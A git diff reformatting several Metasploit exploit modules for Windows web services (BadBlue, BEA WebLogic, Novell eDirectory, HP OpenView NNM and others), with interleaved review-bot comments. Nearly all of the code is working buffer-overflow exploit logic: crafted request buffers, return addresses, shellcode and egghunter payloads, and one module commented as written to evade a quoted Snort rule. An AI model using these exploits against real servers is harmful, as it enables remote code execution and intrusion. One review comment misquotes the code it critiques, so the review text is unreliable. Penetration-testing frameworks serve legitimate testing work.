@@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'BadBlue 2.72b PassThru Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the PassThru - functionality in ext.dll in BadBlue 2.72b and earlier. + functionality in ext.dll in BadBlue 2.72b and earlier. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -48,23 +46,25 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'BadBlue 2.72b Universal', { 'Ret' => 0x1003f2f3 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 10 2007')) - - register_options( [Opt::RPORT(80),], self.class ) + register_options( + [ + Opt::RPORT(80) + ], self.class) end def exploit # Need to obfuscate the buffer a bit more. "\x96" is ghetto. - uri = "/ext.dll?mfcisapicommand=PassThru&" + "\x96" * (4116 - payload.encoded.length) - uri << payload.encoded + Rex::Arch::X86.jmp_short(8) + make_nops(2) + [target.ret].pack('V') - uri << make_nops(12) + [0xe8, -850].pack('CV') - + uri = "/ext.dll?mfcisapicommand=PassThru&" + "\x96" * (4116 - payload.encoded.length) + uri << payload.encoded + Rex::Arch::X86.jmp_short(8) + make_nops(2) + [target.ret].pack('V') + uri << make_nops(12) + [0xe8, -850].pack('CV') + print_status("Trying target %s..." % target.name) send_request_raw({'uri' => uri,}, 5) 
diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 77aeb72e5f..7e5b58dbbb 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -9,17 +13,17 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - - include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::Seh + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'BEA WebLogic JSESSIONID Cookie Value Overflow', 'Description' => %q{ - This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable - code is only accessible when clustering is configured. A request containing a - long JSESSION cookie value can lead to arbirtary code execution. + This module exploits a buffer overflow in BEA\'s WebLogic plugin. The vulnerable + code is only accessible when clustering is configured. A request containing a + long JSESSION cookie value can lead to arbirtary code execution. }, 'Author' => 'pusscat', 'References' => 
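Review bot: The rewritten description line `This module exploits a buffer overflow in BEA\'s WebLogic plugin. The vulnerable` in the `@@ -9,17 +13,17 @@` hunk of bea_weblogic_jsessionid.rb introduces a stray backslash: inside a `%q{...}` literal only `\\` and the delimiter are escapable, so `\'` is kept verbatim and the module description now reads `BEA\'s`. The original `BEA's` needed no escaping because the literal is brace-delimited. Revert that line to `This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable`. The `initialize` method continues past the end of this hunk.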
@@ -37,24 +41,27 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 800, 'BadChars' => "\x00\x0d\x0a\x20\x3B\x3D\x2C", - 'StackAdjustment' => -3500, - + 'StackAdjustment' => -3500, }, - 'Targets' => - [ - [ 'Windows Apache 2.2 - WebLogic module version 1.0.1136334', - { - 'Ret' => 0x1006c9b5, # jmp esp - } + 'Targets' => + [ + [ 'Windows Apache 2.2 - WebLogic module version 1.0.1136334', + { + 'Ret' => 0x1006c9b5, # jmp esp + } + ], + [ 'Windows Apache 2.2 - WebLogic module version 1.0.1150354', + { + 'Ret' => 0x1006c9be, # jmp esp + } + ], ], - [ 'Windows Apache 2.2 - WebLogic module version 1.0.1150354', - { - 'Ret' => 0x1006c9be, # jmp esp - } - ], - ], 'DefaultTarget' => 1)) - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( + [ + Opt::RPORT(80) + ], self.class ) end def exploit @@ -62,9 +69,9 @@ class Metasploit3 < Msf::Exploit::Remote sploit[8181, 4] = [target.ret].pack('V') sploit[8185, payload.encoded.length] = payload.encoded - request = + request = "POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nCookie: TAGLINE=IAMMCLOVIN; JSESSIONID=" + - sploit + + sploit + "\r\n\r\n" connect @@ -75,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote end end - + diff --git a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index 7ee0910ea0..56ad5f02f4 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -9,19 +13,19 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - - include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::Seh + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'BEA Weblogic Transfer-Encoding Buffer Overflow', 'Description' => %q{ - This module exploits a stack based buffer overflow in the BEA - Weblogic Apache plugin. This vulnerability exists in the - error reporting for unknown Transfer-Encoding headers. - You may have to run this twice due to timing issues with handlers. - }, + This module exploits a stack based buffer overflow in the BEA + Weblogic Apache plugin. This vulnerability exists in the + error reporting for unknown Transfer-Encoding headers. + You may have to run this twice due to timing issues with handlers. + }, 'Author' => 'pusscat', 'References' => [ @@ -30,20 +34,19 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html'], ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'seh', - }, + 'DefaultOptions' => + { + 'EXITFUNC' => 'seh', + }, 'Privileged' => true, 'Platform' => 'win', 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x0d\x0a", - 'StackAdjustment' => -1500, - + 'StackAdjustment' => -1500, }, - 'Targets' => + 'Targets' => [ [ 'Windows Apache 2.2 version Universal', { 
@@ -53,26 +56,30 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Sept 09 2008', 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( + [ + Opt::RPORT(80) + ], self.class ) end def exploit - sploit = Rex::Text.rand_text_alphanumeric(5800, payload_badchars) - sploit[5781, 8] = "\xeb\x06MC" + [target.ret].pack('V') - sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff" - sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded - request = - "POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: " + - sploit + - "\r\n\r\n" - - handler - connect - sock.put(request); + sploit = Rex::Text.rand_text_alphanumeric(5800, payload_badchars) + sploit[5781, 8] = "\xeb\x06MC" + [target.ret].pack('V') + sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff" + sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded - disconnect + request = + "POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: " + + sploit + + "\r\n\r\n" + + handler + connect + sock.put(request); + + disconnect end end - diff --git a/modules/exploits/windows/http/belkin_bulldog.rb b/modules/exploits/windows/http/belkin_bulldog.rb index a851f9baab..1d290d3540 100644 --- a/modules/exploits/windows/http/belkin_bulldog.rb +++ b/modules/exploits/windows/http/belkin_bulldog.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Belkin Bulldog Plus Web Service Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Belkin Bulldog Plus 
@@ -46,15 +46,14 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows XP SP3 English', { 'Ret' => 0x7e4456f7 } ], ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 8 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit @@ -77,5 +76,5 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) handler - end + end end diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index e3c14774b0..6464126108 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -9,8 +9,6 @@ # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -21,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'CA iTechnology iGateway Debug Mode Buffer Overflow', 'Description' => %q{ - This module exploits a vulnerability in the Computer Associates + This module exploits a vulnerability in the Computer Associates iTechnology iGateway component. When <Debug>True</Debug> is enabled in igateway.conf (non-default), it is possible to overwrite the stack and execute code remotely. This module works best with Ordinal payloads. @@ -46,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1024, 'BadChars' => "\x00\x0a\x0d\x20", 'StackAdjustment' => -3500, - 'Compat' => + 'Compat' => { 'ConnectionType' => '+ws2ord', }, 
@@ -66,28 +64,28 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - def check - connect - sock.put("HEAD / HTTP/1.0\r\n\r\n\r\n") - banner = sock.get(-1,3) + def check + connect + sock.put("HEAD / HTTP/1.0\r\n\r\n\r\n") + banner = sock.get(-1,3) - if (banner =~ /GET and POST methods are the only methods supported at this time/) # Unique? - return Exploit::CheckCode::Detected - end - return Exploit::CheckCode::Safe - end - - def exploit - connect - - seh = generate_seh_payload(target.ret) - buffer = Rex::Text.rand_text_alphanumeric(5000) - buffer[1082, seh.length] = seh - sploit = "GET /" + buffer + " HTTP/1.0" - - sock.put(sploit + "\r\n\r\n\r\n") - - disconnect - handler + if (banner =~ /GET and POST methods are the only methods supported at this time/) # Unique? + return Exploit::CheckCode::Detected end + return Exploit::CheckCode::Safe end + + def exploit + connect + + seh = generate_seh_payload(target.ret) + buffer = Rex::Text.rand_text_alphanumeric(5000) + buffer[1082, seh.length] = seh + sploit = "GET /" + buffer + " HTTP/1.0" + + sock.put(sploit + "\r\n\r\n\r\n") + + disconnect + handler + end +end diff --git a/modules/exploits/windows/http/edirectory_host.rb b/modules/exploits/windows/http/edirectory_host.rb index e34e664b33..33ce8cfbe3 100644 --- a/modules/exploits/windows/http/edirectory_host.rb +++ b/modules/exploits/windows/http/edirectory_host.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking 
@@ -23,16 +21,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Novell eDirectory NDS Server Host Header Overflow', 'Description' => %q{ - This module exploits a stack overflow in Novell eDirectory 8.8.1. - The web interface does not validate the length of the - HTTP Host header prior to using the value of that header in an + This module exploits a stack overflow in Novell eDirectory 8.8.1. + The web interface does not validate the length of the + HTTP Host header prior to using the value of that header in an HTTP redirect. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2006-5478'], ['OSVDB', '29993'], ['BID', '20655'], @@ -50,24 +48,21 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll + [ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll ], - 'Privileged' => true, - 'DisclosureDate' => 'Oct 21 2006', - 'DefaultTarget' => 0)) - register_options([Opt::RPORT(8028)], self.class) + register_options([Opt::RPORT(8028)], self.class) end def exploit connect - sploit = "GET /nds HTTP/1.1" + "\r\n" - sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars) - sploit << "," + rand_text_alphanumeric(719, payload_badchars) + sploit = "GET /nds HTTP/1.1" + "\r\n" + sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars) + sploit << "," + rand_text_alphanumeric(719, payload_badchars) seh = generate_seh_payload(target.ret) sploit[705, seh.length] = seh sploit << "\r\n\r\n" @@ -75,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/http/edirectory_imonitor.rb b/modules/exploits/windows/http/edirectory_imonitor.rb index 2476b5dc4a..35e9c7ac83 100644 --- a/modules/exploits/windows/http/edirectory_imonitor.rb 
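Review bot: In the `@@ -50,24 +48,21 @@` hunk the `-` markers in front of `'Privileged' => true`, `'DisclosureDate' => 'Oct 21 2006'` and `'DefaultTarget' => 0))` have no `+` counterparts; as rendered they can be read either as blank lines removed ahead of those entries (the pattern this cleanup follows in the other files) or as the entries themselves being deleted. If it is the latter, the `super(update_info(info,` call in `initialize` is never closed and the module will not load, so please confirm the three keys survive on the new side. The hunk header counts (24 old, 21 new) fit both readings, so the diff alone cannot settle it. `initialize` starts outside this hunk.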
+++ b/modules/exploits/windows/http/edirectory_imonitor.rb @@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'eDirectory 8.7.3 iMonitor Remote Stack Overflow', 'Description' => %q{ - This module exploits a stack overflow in eDirectory 8.7.3 + This module exploits a stack overflow in eDirectory 8.7.3 iMonitor service. This vulnerability was discovered by Peter Winter-Smith of NGSSoftware. - }, 'Author' => [ 'anonymous', 'Matt Olney <scacynwrig@yahoo.com>' ], 'License' => BSD_LICENSE, @@ -35,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2005-2551'], [ 'OSVDB', '18703'], [ 'BID', '14548'], - ], 'Privileged' => true, 'DefaultOptions' => @@ -49,31 +45,30 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows (ALL) - eDirectory 8.7.3 iMonitor', { 'Ret' => 0x63501f15 } ], # pop/pop/ret ], 'DisclosureDate' => 'Aug 11 2005', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(8008) - ], self.class) - + register_options( + [ + Opt::RPORT(8008) + ], self.class) end def exploit c = connect - + # pop/pop/ret in ndsimon.dlm on our jump to our shellcode uri = '/nds/' + payload.encoded + make_nops(2) + "\xeb\x04" + [target.ret].pack('V') uri << "\xe9\xbd\xef\xff\xff" uri << "B" * 0xD0 - + res = c.send_request(c.request_raw({ 'uri' => uri })) sleep(4) - + handler disconnect end 
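Review bot: In `exploit`, `res = c.send_request_raw(c.request_raw({ 'uri' => uri }))` assigns a response that is never read; the fixed `sleep(4)` that follows is what actually keeps the connection up for the payload. Drop the dead local and comment the wait, e.g. `c.send_request_raw(c.request_raw({ 'uri' => uri }))` followed by `sleep(4) # give the overflowed request time to reach the payload before disconnect — TODO confirm the delay is needed`, since nothing in the hunk says why four seconds. The `uri` also carries `payload.encoded`, the two NOPs and the packed return address raw in the request path with no URL-encoding, which is only safe if the module's BadChars (set outside this hunk) exclude every byte the server would decode or reject; a comment at the `uri =` line noting that dependency would help.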
diff --git a/modules/exploits/windows/http/fdm_auth_header.rb b/modules/exploits/windows/http/fdm_auth_header.rb index 58e3af1982..f74d14eaf8 100644 --- a/modules/exploits/windows/http/fdm_auth_header.rb +++ b/modules/exploits/windows/http/fdm_auth_header.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -13,13 +17,13 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Free Download Manager Remote Control Server Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Free Download Manager - Remote Control 2.5 Build 758. When sending a specially crafted - Authorization header, an attacker may be able to execute - arbitrary code. + Remote Control 2.5 Build 758. When sending a specially crafted + Authorization header, an attacker may be able to execute + arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -41,10 +45,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Privileged' => true, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Free Download Manager 2.5 Build 758', { 'Ret' => 0x0040ae0f } ], # fdmwi.exe - ], + ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 2 2009')) end diff --git a/modules/exploits/windows/http/hp_nnm_openview5.rb b/modules/exploits/windows/http/hp_nnm_openview5.rb index b0e232d41d..07433cd6df 100644 --- a/modules/exploits/windows/http/hp_nnm_openview5.rb +++ b/modules/exploits/windows/http/hp_nnm_openview5.rb 
@@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in HP OpenView Network Node Manager 7.50. - By sending a specially crafted CGI request, an attacker may be able to execute - arbitrary code. + By sending a specially crafted CGI request, an attacker may be able to execute + arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -47,26 +45,25 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll + [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 6 2007')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit connect sploit = "GET /OvCgi/OpenView5.exe?Context=Snmp&Action=" + rand_text_alpha_upper(5123) - sploit << [target.ret].pack('V') + payload.encoded - + sploit << [target.ret].pack('V') + payload.encoded + print_status("Trying target %s..." % target.name) sock.put(sploit + "\r\n\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 96ed4d2621..4ff8585b98 100644 
--- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -12,13 +12,12 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in HP OpenView Network Node Manager 7.53. @@ -65,16 +64,15 @@ class Metasploit3 < Msf::Exploit::Remote }, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'HP OpenView Network Node Manager 7.53', { 'Ret' => 0x5a212a4a } ], # jmp esp in ov.dll [ 'HP OpenView Network Node Manager 7.53 (Windows 2003)', { 'Ret' => 0x71c02b67 } ] # push esp / ret in ws2_32.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 9 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index 6d028703e6..0e10eaab89 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb 
@@ -1,11 +1,14 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - ## # This should bypass the following snort rule referenced from web-misc.rules (10/17/2008) # alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;) @@ -19,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote # =( need more targets and perhaps more OS specific return values OS specific would be preferred include Msf::Exploit::Remote::HttpClient - + def initialize(info = {}) super(update_info(info, 'Name' => 'HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication SEH Overflow', @@ -30,18 +33,18 @@ class Metasploit3 < Msf::Exploit::Remote Exploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode which was alphanumeric encoded by muts in the original exploit. - + If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process as soon as possible. Any connections get reset after a short period of time. This is probably some timeout handling code that causes this. }, 'Author' => [ - 'bannedit', + 'bannedit', # muts wrote the original exploit and did most of the initial work # credit where credit is due. =) 'muts' - ], + ], 'Version' => '$Revision$', 'References' => 
@@ -57,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => - { + { 'Space' => 1000, 'BadChars' => "\x0a\x0d\x00", 'StackAdjustment' => -3500, @@ -72,13 +75,13 @@ class Metasploit3 < Msf::Exploit::Remote 'auto' => true } ], - - [ 'Windows 2003/zip.dll OpenView 7.53', + + [ 'Windows 2003/zip.dll OpenView 7.53', { 'Ret' => 0x6d633757 # pop pop ret } ], - + [ 'Windows 2000/jvm.dll OpenView NNM 7.51', { 'Ret' => 0x6d356c6e # pop pop ret @@ -87,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 02 2008')) - + register_options( [ Opt::RPORT(7510), @@ -96,10 +99,10 @@ class Metasploit3 < Msf::Exploit::Remote end - def exploit + def exploit targ = target - + if (target['auto']) print_status("Detecting the remote version...") resp = send_request_raw({'uri' => '/topology/home'}, 5) @@ -116,20 +119,20 @@ class Metasploit3 < Msf::Exploit::Remote else raise RuntimeError, "Unable to determine a target automatically..." # if snmp is running you could set the target based on community strings - + end end print_status("Using target: #{targ.name}") - exploit_target(targ) + exploit_target(targ) end - - + + def exploit_target(targ) # we have to use an egghunter in this case because of the restrictions # on the characters we can use. # we are using skape's egghunter alpha numeric encoded by muts - egghunter = + egghunter = '%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J'+ 'MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5'+ '21*-q!au-q!au-oGSePAA%JMNU%521*-D'+ @@ -138,9 +141,9 @@ class Metasploit3 < Msf::Exploit::Remote 'TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA'+ 'A%JMNU%521*-R222-1111-nZJ2PAA%JMN'+ 'U%521*-1-wD-1-wD-8$GwP' - + print_status("Constructing the malformed http request") - + buf = "http://" buf << "\xeb" * 1101 # this gets mangled in such a way we can use less input buf << "\x41" * 4 # sometimes less really is more 
@@ -150,10 +153,10 @@ class Metasploit3 < Msf::Exploit::Remote buf << egghunter buf << "\x41" * 100 buf << ":#{datastore['RPORT']}" - + # T00W is the egg payload_buf = "T00WT00W" + make_nops(34) + "\x83\xc4\x03" + payload.encoded - + begin connect resp = send_request_raw({ @@ -171,18 +174,18 @@ class Metasploit3 < Msf::Exploit::Remote # do nothing let the exploit live this catches the # connection reset by peer error which is expected end - + if not resp.nil? raise RuntimeError, "The server responded, that wasn't supposed to happen!" end - + print_status("Malformed http request sent.") print_status("Now we wait for the egg hunter to work it's magic. thx skape!") handler disconnect end - - + + def check resp = send_request_raw({'uri' => '/topology/home'}, 5) diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index c8f0e39c13..c755d445db 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ 
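Review bot: `if not resp.nil?` in `exploit_target` is the roundabout form; `nil` and `false` are the only falsy values in Ruby and `send_request_raw` yields a response object or nil, so `raise RuntimeError, "The server responded, that wasn't supposed to happen!" if resp` says the same in one line. Because the `rescue` above deliberately swallows the expected connection reset, `resp` is nil on both the success path and the reset path and is only non-nil when the overflow did not fire; stating that in a comment above the raise would make the inverted-looking check self-explanatory. The user-visible status string `work it's magic` should read `its` (possessive). `def check` begins at the end of this hunk and its body continues outside it.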
@@ -8,18 +12,17 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in HP OpenView Network Node Manager 7.50. - By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute - arbitrary code. + By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute + arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -42,15 +45,14 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'HP OpenView Network Node Manager 7.50', { 'Ret' => 0x5a01d78d } ], # ov.dll + [ 'HP OpenView Network Node Manager 7.50', { 'Ret' => 0x5a01d78d } ], # ov.dll ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 9 2009')) - - register_options( [ Opt::RPORT(80) ], self.class ) + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit @@ -64,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => "POST", 'data' => "Topic=#{sploit}", }, 3) - + handler end diff --git a/modules/exploits/windows/http/hp_nnm_snmp.rb b/modules/exploits/windows/http/hp_nnm_snmp.rb index 476c42a133..0904719131 100644 --- a/modules/exploits/windows/http/hp_nnm_snmp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmp.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ 
